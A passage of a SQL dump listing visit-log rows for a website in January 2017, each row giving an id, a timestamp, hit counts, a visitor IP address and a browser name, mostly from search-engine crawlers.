1,0,'66.249.64.27',''),(83794,1484684648,2,2,0,0,'141.0.13.19','other'),(83795,1484685179,2,0,2,0,'66.249.64.27',''),(83796,1484685194,1,0,1,0,'66.249.64.24',''),(83797,1484685239,1,0,1,0,'66.249.64.21',''),(83798,1484685629,2,2,0,0,'141.8.183.25','other'),(83799,1484685690,1,0,1,0,'68.180.229.190',''),(83800,1484686227,1,1,0,0,'130.193.51.19','other'),(83801,1484686728,1,1,0,0,'141.8.142.58','other'),(83802,1484686735,1,1,0,0,'66.249.64.21','chrome'),(83803,1484686821,2,2,0,0,'141.8.142.175','other'),(83804,1484687129,1,1,0,0,'130.193.50.34','other'),(83805,1484688573,1,1,0,0,'92.112.44.235','chrome'),(83806,1484688602,1,1,0,0,'66.249.64.27','chrome'),(83807,1484688617,1,1,0,0,'66.249.64.21','chrome'),(83808,1484689987,1,1,0,0,'93.115.95.206','chrome'),(83809,1484690341,1,1,0,0,'163.172.64.247','other'),(83810,1484690902,1,1,0,0,'163.172.64.217','other'),(83811,1484691079,1,0,1,0,'66.249.64.21',''),(83812,1484691538,2,2,0,0,'141.8.142.175','other'),(83813,1484691688,2,2,0,0,'130.193.50.34','other'),(83814,1484691810,1,1,0,0,'141.8.183.25','other'),(83815,1484692761,1,1,0,0,'46.73.112.28','msie'),(83816,1484693046,1,1,0,0,'37.204.152.138','msie'),(83817,1484695051,1,0,1,0,'66.249.64.183',''),(83818,1484697198,1,1,0,0,'46.73.151.187','chrome'),(83819,1484697257,1,1,0,0,'178.92.8.187','firefox'),(83820,1484698541,1,0,1,0,'66.249.64.187',''),(83821,1484699427,1,0,1,0,'66.249.64.179',''),(83822,1484700153,1,1,0,0,'66.249.64.59','chrome'),(83823,1484700398,1,0,1,0,'66.249.64.183',''),(83824,1484700554,1,1,0,0,'176.8.225.43','opera'),(83825,1484702527,1,0,1,0,'66.249.64.187',''),(83826,1484704089,1,0,1,0,'66.249.64.187',''),(83827,1484704802,7,7,0,0,'144.76.39.234','other'),(83828,1484708579,1,1,0,0,'66.249.64.61','chrome'),(83829,1484709064,1,1,0,0,'66.249.64.59','chrome'),(83830,1484709137,1,0,1,0,'66.249.64.179',''),(83831,1484709142,1,0,1,0,'66.249.64.183',''),(83832,1484710066,1,0,1,0,'66.249.64.183',''),(83833,1484710108,1,1,0,0,'95.28.165.178','msie'),(83834,1484710467,1,1,0,0,'163.172.64.193','other'),(83835,1484710651,1,1,0,0,'163.172.64.235','other'),(83836,1484711469,1,1,0,0,'66.249.64.183','chrome'),(83837,1484711768,1,1,0,0,'163.172.64.223','other'),(83838,1484711813,1,1,0,0,'66.249.64.187','chrome'),(83839,1484713526,1,1,0,0,'178.140.54.31','chrome'),(83840,1484713557,1,1,0,0,'176.195.110.223','chrome'),(83841,1484713692,1,0,1,0,'66.249.64.59',''),(83842,1484714177,1,0,1,0,'66.249.64.187',''),(83843,1484714247,1,1,0,0,'46.242.52.116','msie'),(83844,1484715132,1,0,1,0,'66.249.64.179',''),(83845,1484715204,1,1,0,0,'77.37.140.74','msie'),(83846,1484715692,1,1,0,0,'109.63.195.169','msie'),(83847,1484715868,1,1,0,0,'176.195.111.87','msie'),(83848,1484716493,1,0,1,0,'66.249.64.187',''),(83849,1484717859,1,1,0,0,'180.76.15.30','other'),(83850,1484718075,1,1,0,0,'91.196.178.67','firefox'),(83851,1484718700,1,1,0,0,'180.76.15.160','other'),(83852,1484719608,1,0,1,0,'66.249.64.183',''),(83853,1484720116,1,1,0,0,'109.63.179.147','msie'),(83854,1484720276,1,1,0,0,'95.134.220.181','firefox'),(83855,1484720673,1,0,1,0,'66.249.64.179',''),(83856,1484720875,1,1,0,0,'66.102.9.29','chrome'),(83857,1484721286,1,1,0,0,'91.196.178.66','chrome'),(83858,1484721302,1,1,0,0,'163.172.64.230','other'),(83859,1484721440,1,1,0,0,'141.8.183.25','other'),(83860,1484721514,1,1,0,0,'91.196.178.72','chrome'),(83861,1484721597,2,1,1,0,'66.249.64.179',''),(83862,1484721814,1,1,0,0,'37.53.239.221','firefox'),(83863,1484721830,2,2,0,0,'141.8.142.175','other'),(83864,1484722197,1,1,0,0,'94.179.93.193','chrome'),(83865,1484722642,1,1,0,0,'95.133.177.122','firefox'),(83866,1484722695,1,0,1,0,'66.249.64.59',''),(83867,1484722785,3,0,3,0,'68.180.229.254',''),(83868,1484723568,1,1,0,0,'78.137.4.82','firefox'),(83869,1484723587,1,1,0,0,'91.196.178.70','firefox'),(83870,1484723767,1,1,0,0,'94.179.147.66','firefox'),(83871,1484724194,1,1,0,0,'188.32.134.19','chrome'),(83872,1484724494,1,1,0,0,'94.179.31.109','firefox'),(83873,1484725265,1,0,1,0,'66.249.64.183',''),(83874,1484725519,1,1,0,0,'91.196.178.70','firefox'),(83875,1484726446,1,1,0,0,'37.53.163.94','firefox'),(83876,1484726773,1,1,0,0,'91.196.178.66','chrome'),(83877,1484727088,3,0,3,0,'66.249.64.183',''),(83878,1484727093,1,1,0,0,'95.135.24.27','chrome'),(83879,1484727218,1,1,0,0,'77.37.141.103','msie'),(83880,1484727378,4,4,0,0,'141.8.183.25','other'),(83881,1484727412,1,1,0,0,'46.200.35.173','chrome'),(83882,1484727504,1,1,0,0,'85.198.132.136','firefox'),(83883,1484727650,3,3,0,0,'141.8.142.58','other'),(83884,1484727814,3,3,0,0,'130.193.51.19','other'),(83885,1484727848,1,1,0,0,'163.172.64.222','other'),(83886,1484727852,1,1,0,0,'141.8.142.61','other'),(83887,1484728029,1,1,0,0,'141.8.142.175','other'),(83888,1484728347,1,1,0,0,'141.8.183.25','other'),(83889,1484728456,1,1,0,0,'130.193.50.34','other'),(83890,1484728988,1,1,0,0,'91.196.178.70','firefox'),(83891,1484729065,1,0,1,0,'68.180.229.254',''),(83892,1484729146,2,0,2,0,'66.249.64.183',''),(83893,1484729186,61,61,0,0,'51.255.173.7','other'),(83894,1484729422,1,1,0,0,'130.180.219.9','firefox'),(83895,1484729529,2,2,0,0,'130.193.50.34','other'),(83896,1484730560,1,1,0,0,'5.228.35.80','chrome'),(83897,1484730608,1,1,0,0,'95.134.220.181','firefox'),(83898,1484731177,1,0,1,0,'66.249.64.183',''),(83899,1484731232,1,1,0,0,'178.214.207.74','chrome'),(83900,1484731287,1,1,0,0,'92.112.255.181','chrome'),(83901,1484731305,1,1,0,0,'130.193.50.34','other'),(83902,1484731336,1,1,0,0,'141.8.142.175','other'),(83903,1484731672,1,1,0,0,'178.154.189.31','other'),(83904,1484731924,1,1,0,0,'91.196.178.130','chrome'),(83905,1484732177,1,0,1,0,'66.249.64.59',''),(83906,1484732561,1,1,0,0,'130.193.50.4','other'),(83907,1484732703,1,1,0,0,'163.172.64.242','other'),(83908,1484732924,1,1,0,0,'66.249.64.187','chrome'),(83909,1484732972,1,1,0,0,'92.112.67.34','chrome'),(83910,1484733045,1,1,0,0,'5.255.253.67','other'),(83911,1484733244,1,1,0,0,'141.8.142.58','other'),(83912,1484733287,1,1,0,0,'130.193.51.19','other'),(83913,1484734356,1,1,0,0,'141.8.142.175','other'),(83914,1484734837,1,1,0,0,'91.201.180.55','chrome'),(83915,1484734924,1,1,0,0,'130.193.51.19','other'),(83916,1484735387,1,1,0,0,'141.8.142.175','other'),(83917,1484735782,2,2,0,0,'130.193.50.34','other'),(83918,1484736422,1,1,0,0,'163.172.64.222','other'),(83919,1484736524,1,0,1,0,'66.249.64.179',''),(83920,1484736605,1,0,1,0,'66.249.64.187',''),(83921,1484736836,1,1,0,0,'130.180.219.16','chrome'),(83922,1484736918,1,1,0,0,'128.75.226.21','msie'),(83923,1484737261,1,1,0,0,'91.196.178.69','chrome'),(83924,1484737356,1,0,1,0,'66.249.64.183',''),(83925,1484737703,1,1,0,0,'77.37.140.74','msie'),(83926,1484738054,1,1,0,0,'176.15.206.202','msie'),(83927,1484738439,1,0,1,0,'66.249.64.187',''),(83928,1484738895,1,1,0,0,'109.173.51.122','chrome'),(83929,1484739098,1,1,0,0,'141.8.142.58','other'),(83930,1484739110,2,0,2,0,'66.249.64.183',''),(83931,1484739195,1,1,0,0,'130.193.50.34','other'),(83932,1484739226,1,1,0,0,'46.242.122.161','chrome'),(83933,1484739564,1,1,0,0,'141.8.183.25','other'),(83934,1484739749,1,1,0,0,'91.196.177.46','chrome'),(83935,1484739878,1,1,0,0,'141.8.142.175','other'),(83936,1484739880,1,1,0,0,'91.196.178.34','chrome'),(83937,1484740855,1,0,1,0,'66.249.64.187',''),(83938,1484740943,1,1,0,0,'109.63.195.169','msie'),(83939,1484741076,1,1,0,0,'95.28.165.178','msie'),(83940,1484741746,1,1,0,0,'95.133.98.39','chrome'),(83941,1484743236,1,0,1,0,'66.249.64.183',''),(83942,1484744345,1,0,1,0,'66.249.64.59',''),(83943,1484745861,1,1,0,0,'188.255.18.135','chrome'),(83944,1484746924,1,0,1,0,'66.249.64.179',''),(83945,1484747097,1,1,0,0,'91.210.37.166','chrome'),(83946,1484747863,1,1,0,0,'91.196.178.130','firefox'),(83947,1484748168,3,3,0,0,'62.210.97.48','other'),(83948,1484748545,1,1,0,0,'176.195.113.170','chrome'),(83949,1484748559,1,1,0,0,'46.18.1.83','chrome'),(83950,1484748576,1,1,0,0,'141.8.142.175','other'),(83951,1484748834,1,1,0,0,'91.196.177.26','chrome'),(83952,1484749221,1,1,0,0,'40.77.167.19','other'),(83953,1484750881,1,1,0,0,'163.172.64.252','other'),(83954,1484751046,1,1,0,0,'93.171.76.165','chrome'),(83955,1484751764,1,0,1,0,'66.249.64.179',''),(83956,1484752096,1,1,0,0,'95.134.220.181','firefox'),(83957,1484752417,1,0,1,0,'66.249.64.187',''),(83958,1484752496,1,1,0,0,'95.24.157.30','msie'),(83959,1484753072,1,0,1,0,'66.249.64.179',''),(83960,1484753084,1,1,0,0,'157.55.39.186','other'),(83961,1484754195,1,1,0,0,'91.196.178.67','firefox'),(83962,1484754214,1,0,1,0,'66.249.64.179',''),(83963,1484756028,1,1,0,0,'92.112.249.21','chrome'),(83964,1484756271,1,1,0,0,'40.77.167.4','other'),(83965,1484757516,1,1,0,0,'40.77.167.4','other'),(83966,1484759007,1,1,0,0,'46.211.69.18','chrome'),(83967,1484759238,1,1,0,0,'109.173.100.22','msie'),(83968,1484760006,1,1,0,0,'46.211.69.18','chrome'),(83969,1484760598,1,1,0,0,'95.220.82.227','chrome'),(83970,1484761037,1,1,0,0,'95.132.132.133','chrome'),(83971,1484761053,1,1,0,0,'91.196.178.167','chrome'),(83972,1484761703,1,0,1,0,'66.249.64.27',''),(83973,1484762314,1,1,0,0,'163.172.64.249','other'),(83974,1484762553,1,1,0,0,'91.224.97.38','chrome'),(83975,1484762583,1,0,1,0,'66.249.64.24',''),(83976,1484762589,1,1,0,0,'130.193.50.34','other'),(83977,1484762747,1,1,0,0,'195.230.153.46','firefox'),(83978,1484763168,1,1,0,0,'91.196.178.35','chrome'),(83979,1484763266,1,0,1,0,'66.249.64.21',''),(83980,1484763350,1,1,0,0,'178.93.59.154','chrome'),(83981,1484763823,1,1,0,0,'195.154.181.162','chrome'),(83982,1484764047,1,1,0,0,'46.211.145.71','chrome'),(83983,1484764563,1,1,0,0,'40.77.167.4','other'),(83984,1484764612,1,1,0,0,'66.102.9.27','chrome'),(83985,1484765121,1,1,0,0,'141.8.142.175','other'),(83986,1484765980,1,0,1,0,'68.180.229.190',''),(83987,1484766100,1,1,0,0,'176.122.106.100','chrome'),(83988,1484767130,2,0,2,0,'66.249.64.24',''),(83989,1484767812,1,1,0,0,'94.179.124.55','firefox'),(83990,1484768045,1,1,0,0,'141.8.142.175','other'),(83991,1484768050,8,8,0,0,'130.193.50.34','other'),(83992,1484768257,1,0,1,0,'66.249.64.21',''),(83993,1484768562,1,1,0,0,'66.249.64.27','chrome'),(83994,1484770874,1,1,0,0,'163.172.64.226','other'),(83995,1484771144,1,1,0,0,'94.179.201.36','chrome'),(83996,1484771244,1,1,0,0,'159.224.109.252','chrome'),(83997,1484771251,1,1,0,0,'130.193.50.34','other'),(83998,1484771417,1,1,0,0,'163.172.64.185','other'),(83999,1484772111,1,0,1,0,'66.249.64.79',''),(84000,1484773204,1,0,1,0,'66.249.64.24',''),(84001,1484773479,1,0,1,0,'66.249.64.27',''),(84002,1484775615,3,3,0,0,'144.76.39.234','other'),(84003,1484775844,1,0,1,0,'66.249.64.69',''),(84004,1484778243,1,1,0,0,'163.172.64.235','other'),(84005,1484779156,1,0,1,0,'66.249.64.21',''),(84006,1484780538,1,1,0,0,'188.32.238.33','msie'),(84007,1484782257,81,2,79,0,'107.150.59.210',''),(84008,1484782602,1,1,0,0,'178.140.25.176','msie'),(84009,1484783170,65,0,65,0,'107.150.59.210',''),(84010,1484783357,1,0,1,0,'66.249.64.21',''),(84011,1484783508,1,1,0,0,'157.55.39.186','other'),(84012,1484783846,71,71,0,0,'107.150.59.210','msie'),(84013,1484784176,5,5,0,0,'107.150.59.210','firefox'),(84014,1484785061,1,0,1,0,'66.249.64.27',''),(84015,1484786680,1,1,0,0,'176.195.98.24','msie'),(84016,1484786777,1,0,1,0,'66.249.64.24',''),(84017,1484786972,1,1,0,0,'176.195.228.124','msie'),(84018,1484787000,1,1,0,0,'66.249.64.27','chrome'),(84019,1484787563,1,1,0,0,'163.172.64.250','other'),(84020,1484789120,1,0,1,0,'66.249.64.24',''),(84021,1484793991,1,0,1,0,'66.249.64.21',''),(84022,1484794905,1,1,0,0,'176.195.98.49','msie'),(84023,1484798065,1,1,0,0,'109.63.235.207','msie'),(84024,1484800970,1,1,0,0,'93.80.41.40','msie'),(84025,1484801211,1,1,0,0,'176.195.119.143','msie'),(84026,1484801630,1,1,0,0,'188.32.176.195','msie'),(84027,1484801651,1,1,0,0,'207.46.13.161','other'),(84028,1484802068,1,1,0,0,'130.193.50.34','other'),(84029,1484803252,1,1,0,0,'109.63.220.152','chrome'),(84030,1484804058,1,1,0,0,'180.76.15.10','other'),(84031,1484804463,1,1,0,0,'130.193.51.19','other'),(84032,1484804966,1,1,0,0,'91.196.178.71','firefox'),(84033,1484806626,2,0,2,0,'66.249.64.27',''),(84034,1484807526,1,1,0,0,'91.196.178.70','firefox'),(84035,1484807527,1,1,0,0,'141.8.142.58','other'),(84036,1484808775,2,2,0,0,'91.196.178.72','firefox'),(84037,1484808868,1,1,0,0,'66.102.9.25','chrome'),(84038,1484809434,1,1,0,0,'178.95.176.49','firefox'),(84039,1484809725,1,1,0,0,'46.188.29.95','msie'),(84040,1484809942,1,1,0,0,'128.69.193.24','msie'),(84041,1484810136,1,0,1,0,'66.249.64.69',''),(84042,1484810399,1,1,0,0,'40.77.167.19','other'),(84043,1484810841,1,1,0,0,'178.95.176.49','firefox'),(84044,1484811363,1,1,0,0,'95.135.230.102','chrome'),(84045,1484811411,1,1,0,0,'163.172.64.229','other'),(84046,1484811473,1,1,0,0,'163.172.64.177','other'),(84047,1484812025,1,1,0,0,'130.193.50.34','other'),(84048,1484813120,1,1,0,0,'91.196.177.26','chrome'),(84049,1484813545,1,1,0,0,'91.196.178.68','chrome'),(84050,1484813792,3,3,0,0,'130.193.50.34','other'),(84051,1484814385,1,0,1,0,'66.249.64.27',''),(84052,1484814424,1,1,0,0,'91.196.177.46','chrome'),(84053,1484814903,1,0,1,0,'66.249.64.21',''),(84054,1484814972,1,0,1,0,'66.249.64.69',''),(84055,1484815996,1,1,0,0,'66.249.64.24','chrome'),(84056,1484816100,3,3,0,0,'130.193.50.34','other'),(84057,1484816201,3,3,0,0,'141.8.183.25','other'),(84058,1484816337,1,1,0,0,'141.8.142.58','other'),(84059,1484816648,2,2,0,0,'141.8.142.175','other'),(84060,1484816674,1,0,1,0,'66.249.64.27',''),(84061,1484816687,1,1,0,0,'94.179.105.102','firefox'),(84062,1484816768,2,2,0,0,'130.193.51.19','other'),(84063,1484816964,2,2,0,0,'91.196.178.70','firefox'),(84064,1484817072,1,1,0,0,'93.80.41.40','msie'),(84065,1484817287,1,1,0,0,'141.8.183.25','other'),(84066,1484817387,1,0,1,0,'66.249.64.24',''),(84067,1484817389,1,1,0,0,'37.52.111.90','chrome'),(84068,1484817503,1,1,0,0,'93.171.243.82','other'),(84069,1484817519,1,1,0,0,'141.8.142.58','other'),(84070,1484817639,2,2,0,0,'141.8.142.175','other'),(84071,1484817700,1,1,0,0,'78.111.185.166','firefox'),(84072,1484817784,1,1,0,0,'130.193.50.4','other'),(84073,1484818388,1,0,1,0,'66.249.64.24',''),(84074,1484818769,6,6,0,0,'91.209.51.22','other'),(84075,1484818800,1,1,0,0,'92.113.4.91','chrome'),(84076,1484818917,1,1,0,0,'91.196.178.72','firefox'),(84077,1484819015,2,1,1,0,'66.249.64.24',''),(84078,1484819218,1,1,0,0,'82.145.222.246','other'),(84079,1484819346,1,1,0,0,'95.221.226.173','msie'),(84080,1484819598,1,1,0,0,'141.8.132.2','other'),(84081,1484819602,1,1,0,0,'93.158.152.51','other'),(84082,1484819975,2,0,2,0,'66.249.64.21',''),(84083,1484820166,1,1,0,0,'176.14.38.9','msie'),(84084,1484820169,1,0,1,0,'66.249.64.27',''),(84085,1484820258,1,1,0,0,'130.193.50.38','other'),(84086,1484820366,1,1,0,0,'130.193.50.34','other'),(84087,1484820454,1,1,0,0,'141.8.142.58','other'),(84088,1484820546,1,1,0,0,'141.8.183.25','other'),(84089,1484820819,1,1,0,0,'188.32.134.101','chrome'),(84090,1484821150,1,1,0,0,'95.135.167.121','chrome'),(84091,1484821664,1,1,0,0,'163.172.64.187','other'),(84092,1484822152,1,1,0,0,'188.255.18.171','chrome'),(84093,1484822255,1,0,1,0,'66.249.64.24',''),(84094,1484824134,1,1,0,0,'91.211.132.33','chrome'),(84095,1484824566,2,2,0,0,'207.46.13.161','other'),(84096,1484825551,1,1,0,0,'91.196.178.72','firefox'),(84097,1484826293,1,1,0,0,'188.163.69.2','firefox'),(84098,1484827249,1,1,0,0,'195.225.147.237','chrome'),(84099,1484827397,1,1,0,0,'178.94.27.159','chrome'),(84100,1484827584,1,1,0,0,'207.46.13.161','other'),(84101,1484827589,1,0,1,0,'68.180.229.254',''),(84102,1484827637,1,0,1,0,'66.249.64.21',''),(84103,1484829282,1,0,1,0,'66.249.64.27',''),(84104,1484830113,1,1,0,0,'40.77.167.4','other'),(84105,1484830212,1,1,0,0,'109.63.235.207','msie'),(84106,1484830508,1,1,0,0,'176.195.101.2','chrome'),(84107,1484831499,1,0,1,0,'66.249.64.69',''),(84108,1484831857,1,1,0,0,'66.249.64.21','chrome'),(84109,1484831934,1,1,0,0,'91.196.122.186','chrome'),(84110,1484832156,22,22,0,0,'91.198.143.124','other'),(84111,1484832673,1,1,0,0,'91.196.178.68','chrome'),(84112,1484832720,1,1,0,0,'82.207.91.234','firefox'),(84113,1484833358,1,1,0,0,'141.8.142.175','other'),(84114,1484833753,1,1,0,0,'91.196.178.70','firefox'),(84115,1484833997,1,1,0,0,'91.196.177.26','chrome'),(84116,1484834352,1,1,0,0,'5.165.251.162','msie'),(84117,1484834539,1,0,1,0,'66.249.64.27',''),(84118,1484834726,1,1,0,0,'91.196.178.72','chrome'),(84119,1484835595,1,1,0,0,'91.196.178.68','firefox'),(84120,1484836081,1,1,0,0,'163.172.64.181','other'),(84121,1484836139,1,0,1,0,'66.249.64.27',''),(84122,1484836357,1,1,0,0,'204.13.201.137','msie'),(84123,1484837514,1,1,0,0,'91.196.178.70','chrome'),(84124,1484838017,1,0,1,0,'66.249.64.27',''),(84125,1484838142,1,1,0,0,'109.63.235.52','firefox'),(84126,1484839449,1,1,0,0,'195.154.181.15','chrome'),(84127,1484839780,1,1,0,0,'195.154.181.162','chrome'),(84128,1484841280,1,1,0,0,'91.196.176.13','chrome'),(84129,1484842494,1,1,0,0,'180.76.15.137','other'),(84130,1484844742,1,1,0,0,'66.249.64.27','chrome'),(84131,1484846802,1,1,0,0,'40.77.167.4','other'),(84132,1484847141,1,1,0,0,'40.77.167.19','other'),(84133,1484847860,1,1,0,0,'117.78.13.56','chrome'),(84134,1484848756,1,1,0,0,'176.98.0.158','chrome'),(84135,1484849378,1,1,0,0,'91.196.178.35','chrome'),(84136,1484849752,1,1,0,0,'5.228.20.211','msie'),(84137,1484849911,1,1,0,0,'176.98.0.158','chrome'),(84138,1484851226,1,1,0,0,'91.196.178.161','chrome'),(84139,1484851437,1,0,1,0,'66.249.64.21',''),(84140,1484851911,1,0,1,0,'66.249.64.24',''),(84141,1484852002,1,1,0,0,'66.249.64.79','chrome'),(84142,1484852380,1,1,0,0,'94.179.52.44','chrome'),(84143,1484852790,1,0,1,0,'68.180.229.190',''),(84144,1484852981,1,1,0,0,'46.211.136.217','chrome'),(84145,1484853074,1,1,0,0,'176.195.145.234','chrome'),(84146,1484853251,1,1,0,0,'66.249.64.74','chrome'),(84147,1484853527,1,1,0,0,'195.154.181.162','chrome'),(84148,1484853798,1,1,0,0,'195.154.181.15','chrome'),(84149,1484854342,3,3,0,0,'130.193.50.34','other'),(84150,1484854511,4,4,0,0,'141.8.183.25','other'),(84151,1484854676,1,1,0,0,'141.8.132.41','other'),(84152,1484854720,1,1,0,0,'141.8.142.175','other'),(84153,1484854882,3,3,0,0,'130.193.51.19','other'),(84154,1484855246,1,1,0,0,'130.193.50.34','other'),(84155,1484856709,1,0,1,0,'68.180.229.190',''),(84156,1484856914,1,0,1,0,'66.249.64.24',''),(84157,1484857371,1,1,0,0,'37.115.67.243','chrome'),(84158,1484857440,1,1,0,0,'157.55.39.186','other'),(84159,1484857610,1,1,0,0,'109.63.165.105','msie'),(84160,1484857791,2,2,0,0,'141.8.142.58','other'),(84161,1484857861,3,3,0,0,'141.8.142.175','other'),(84162,1484857939,2,2,0,0,'130.193.50.34','other'),(84163,1484858402,2,2,0,0,'130.193.51.19','other'),(84164,1484858438,1,1,0,0,'46.211.146.46','chrome'),(84165,1484858724,1,1,0,0,'141.8.183.25','other'),(84166,1484858869,1,1,0,0,'141.8.142.175','other'),(84167,1484858909,1,1,0,0,'5.9.70.72','other'),(84168,1484859090,1,1,0,0,'141.0.12.204','other'),(84169,1484860245,1,1,0,0,'40.77.167.4','other'),(84170,1484860509,1,0,1,0,'68.180.229.190',''),(84171,1484860523,1,0,1,0,'66.249.64.24',''),(84172,1484862201,1,0,1,0,'66.249.64.61',''),(84173,1484863600,1,1,0,0,'40.77.167.4','other'),(84174,1484865042,1,1,0,0,'180.76.15.145','other'),(84175,1484867336,1,1,0,0,'141.8.142.175','other'),(84176,1484867628,1,1,0,0,'130.193.51.19','other'),(84177,1484868044,1,0,1,0,'66.249.64.27',''),(84178,1484868123,1,1,0,0,'141.8.142.58','other'),(84179,1484868325,1,1,0,0,'141.8.142.67','other'),(84180,1484868588,1,1,0,0,'141.8.142.175','other'),(84181,1484868714,1,1,0,0,'141.8.183.25','other'),(84182,1484868848,2,1,1,0,'66.249.64.24',''),(84183,1484870979,1,0,1,0,'66.249.64.79',''),(84184,1484873777,2,0,2,0,'66.249.64.24',''),(84185,1484874864,1,1,0,0,'130.193.50.34','other'),(84186,1484875263,1,1,0,0,'141.8.183.25','other'),(84187,1484875351,1,1,0,0,'141.8.142.61','other'),(84188,1484875950,1,1,0,0,'66.249.64.79','chrome'),(84189,1484876508,1,1,0,0,'130.193.51.19','other'),(84190,1484877966,1,0,1,0,'66.249.64.24',''),(84191,1484878594,1,1,0,0,'51.255.46.253','other'),(84192,1484879034,1,1,0,0,'141.8.142.175','other'),(84193,1484879280,1,1,0,0,'141.8.183.25','other'),(84194,1484879366,1,1,0,0,'180.76.15.21','other'),(84195,1484881531,1,1,0,0,'196.64.63.16','firefox'),(84196,1484882206,1,0,1,0,'66.249.64.21',''),(84197,1484883846,1,0,1,0,'68.180.229.254',''),(84198,1484884135,1,0,1,0,'66.249.64.27',''),(84199,1484884383,1,0,1,0,'66.249.64.24',''),(84200,1484885057,1,1,0,0,'40.77.167.4','other'),(84201,1484885206,1,0,1,0,'66.249.64.69',''),(84202,1484885799,1,1,0,0,'141.8.142.175','other'),(84203,1484885881,1,1,0,0,'66.102.9.27','chrome'),(84204,1484886316,1,1,0,0,'141.8.183.25','other'),(84205,1484887144,1,0,1,0,'66.249.64.27',''),(84206,1484887879,2,2,0,0,'141.8.142.61','other'),(84207,1484887986,1,0,1,0,'66.249.64.21',''),(84208,1484888764,2,2,0,0,'130.193.50.34','other'),(84209,1484889031,1,1,0,0,'46.241.7.137','firefox'),(84210,1484889705,1,1,0,0,'157.55.39.186','other'),(84211,1484889940,1,0,1,0,'66.249.64.21',''),(84212,1484890140,1,0,1,0,'66.249.64.27',''),(84213,1484891134,1,1,0,0,'91.196.178.71','firefox'),(84214,1484891388,1,1,0,0,'176.195.204.235','chrome'),(84215,1484891605,1,1,0,0,'40.77.167.19','other'),(84216,1484892196,1,1,0,0,'130.193.51.19','other'),(84217,1484892421,1,1,0,0,'93.158.152.84','other'),(84218,1484892577,1,0,1,0,'66.249.64.24',''),(84219,1484892605,1,1,0,0,'141.8.142.67','other'),(84220,1484893366,1,1,0,0,'141.8.142.175','other'),(84221,1484893417,1,1,0,0,'91.196.177.46','chrome'),(84222,1484893662,1,0,1,0,'66.249.64.79',''),(84223,1484893730,1,1,0,0,'37.115.67.243','chrome'),(84224,1484893914,1,1,0,0,'91.196.178.71','firefox'),(84225,1484893942,1,1,0,0,'130.193.51.19','other'),(84226,1484895026,1,1,0,0,'91.196.178.71','firefox'),(84227,1484895400,1,1,0,0,'91.196.178.70','firefox'),(84228,1484895479,1,1,0,0,'163.172.64.180','other'),(84229,1484895532,1,1,0,0,'195.66.156.30','chrome'),(84230,1484896071,1,0,1,0,'66.249.64.27',''),(84231,1484896103,1,1,0,0,'163.172.64.177','other'),(84232,1484896188,1,1,0,0,'91.196.178.168','chrome'),(84233,1484896328,1,1,0,0,'130.180.216.164','firefox'),(84234,1484896712,1,0,1,0,'66.249.64.21',''),(84235,1484896773,1,1,0,0,'141.8.142.175','other'),(84236,1484896814,1,1,0,0,'95.133.184.126','opera'),(84237,1484897185,1,1,0,0,'94.179.3.34','chrome'),(84238,1484897483,2,2,0,0,'213.108.45.138','firefox'),(84239,1484897864,1,1,0,0,'40.77.167.43','other'),(84240,1484898785,2,2,0,0,'130.193.50.34','other'),(84241,1484899016,1,0,1,0,'66.249.64.24',''),(84242,1484899265,2,0,2,0,'66.249.64.21',''),(84243,1484900038,1,1,0,0,'176.195.109.119','msie'),(84244,1484900278,1,1,0,0,'141.8.142.61','other'),(84245,1484900484,1,1,0,0,'46.211.3.20','chrome'),(84246,1484900618,1,1,0,0,'91.196.178.72','chrome'),(84247,1484901557,1,1,0,0,'94.179.29.104','firefox'),(84248,1484901562,2,2,0,0,'66.249.64.27','chrome'),(84249,1484901581,1,1,0,0,'66.249.64.79','chrome'),(84250,1484901853,1,1,0,0,'40.77.167.4','other'),(84251,1484901868,1,0,1,0,'66.249.64.69',''),(84252,1484902112,1,1,0,0,'92.113.134.90','chrome'),(84253,1484902145,1,1,0,0,'130.193.51.19','other'),(84254,1484902264,1,1,0,0,'91.196.178.98','chrome'),(84255,1484902743,1,1,0,0,'91.196.178.72','firefox'),(84256,1484903277,1,0,1,0,'66.249.64.27',''),(84257,1484904322,1,1,0,0,'141.8.183.19','other'),(84258,1484904735,1,0,1,0,'66.249.64.27',''),(84259,1484905014,1,1,0,0,'141.8.142.175','other'),(84260,1484905030,1,1,0,0,'130.193.51.19','other'),(84261,1484905378,1,0,1,0,'66.249.64.21',''),(84262,1484906646,1,1,0,0,'193.70.37.50','other'),(84263,1484906942,1,1,0,0,'95.135.241.187','chrome'),(84264,1484907035,1,1,0,0,'91.196.178.67','chrome'),(84265,1484907669,1,0,1,0,'66.249.64.21',''),(84266,1484909491,1,1,0,0,'91.124.113.55','chrome'),(84267,1484910045,1,1,0,0,'31.43.19.250','chrome'),(84268,1484910621,1,1,0,0,'89.28.201.171','firefox'),(84269,1484910931,1,1,0,0,'92.113.26.254','firefox'),(84270,1484911299,2,0,2,0,'66.249.64.24',''),(84271,1484912035,1,0,1,0,'68.180.229.254',''),(84272,1484912077,3,0,3,0,'66.249.64.21',''),(84273,1484912107,1,0,1,0,'66.249.64.27',''),(84274,1484912745,1,1,0,0,'89.28.201.171','firefox'),(84275,1484913091,1,1,0,0,'95.134.15.171','chrome'),(84276,1484913246,2,2,0,0,'91.196.178.71','firefox'),(84277,1484914843,1,0,1,0,'66.249.64.24',''),(84278,1484915333,1,0,1,0,'66.249.64.21',''),(84279,1484916289,1,0,1,0,'66.249.64.21',''),(84280,1484916654,1,1,0,0,'66.249.64.27','chrome'),(84281,1484916835,1,1,0,0,'91.196.177.46','firefox'),(84282,1484917032,1,1,0,0,'91.196.178.70','firefox'),(84283,1484917669,1,1,0,0,'178.94.34.250','firefox'),(84284,1484917733,2,2,0,0,'178.95.176.49','firefox'),(84285,1484918871,1,0,1,0,'66.249.64.27',''),(84286,1484919253,1,1,0,0,'91.196.177.46','chrome'),(84287,1484920108,1,1,0,0,'77.52.93.155','chrome'),(84288,1484920790,1,1,0,0,'37.52.160.18','chrome'),(84289,1484920881,1,1,0,0,'91.196.177.26','chrome'),(84290,1484920943,1,1,0,0,'141.8.142.58','other'),(84291,1484921090,1,0,1,0,'66.249.64.27',''),(84292,1484921931,1,1,0,0,'141.8.142.58','other'),(84293,1484922200,1,1,0,0,'40.77.167.19','other'),(84294,1484923031,1,1,0,0,'141.8.142.175','other'),(84295,1484923061,2,0,2,0,'66.249.64.21',''),(84296,1484923368,1,1,0,0,'141.8.183.25','other'),(84297,1484924062,1,1,0,0,'141.8.142.58','other'),(84298,1484924279,1,0,1,0,'66.249.64.27',''),(84299,1484924365,1,1,0,0,'91.196.178.37','chrome'),(84300,1484924481,1,0,1,0,'66.249.64.21',''),(84301,1484924970,1,1,